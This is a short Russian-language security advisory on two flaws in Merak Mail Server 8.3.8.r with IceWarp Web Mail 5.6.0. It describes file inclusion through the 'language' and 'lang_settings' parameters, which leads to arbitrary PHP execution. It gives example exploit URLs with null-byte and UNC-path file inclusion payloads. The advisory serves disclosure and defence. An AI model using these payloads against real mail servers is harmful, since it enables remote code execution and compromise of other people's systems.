Программа:
Merak Mail Server 8.3.8.r c IceWarp Web Mail 5.6.0, возможно другие версии.
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "language" и "lang_settings" в функции "securepath()" в сценариях "/accounts/inc/include.php" и "/admin/inc/include.php". Удаленный пользователь может внедрить PHP кодв лог файл и затем выполнить его выполнить, указав полный путь к файлу на Windows системе.
Пример:
http://[host]:32000/admin/inc/include.php?language= 0&lang_settings[0][1]=c:\[file]%00
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "language" в сценарии "/mail/settings.html" перед записью данных в базу данных. Удаленный пользователь может переписать значение переменной "lang_settings" и подключить произвольные файлы на локальной системе. Для удачной эксплуатации уязвимости требуется валидная учетная запись.
Пример:
http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST] =test;&lang_settings[TEST]=test;c:\[file]%00;
http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST] =test;&lang_settings[TEST]=test;\\[host]\[share]\[file]%00;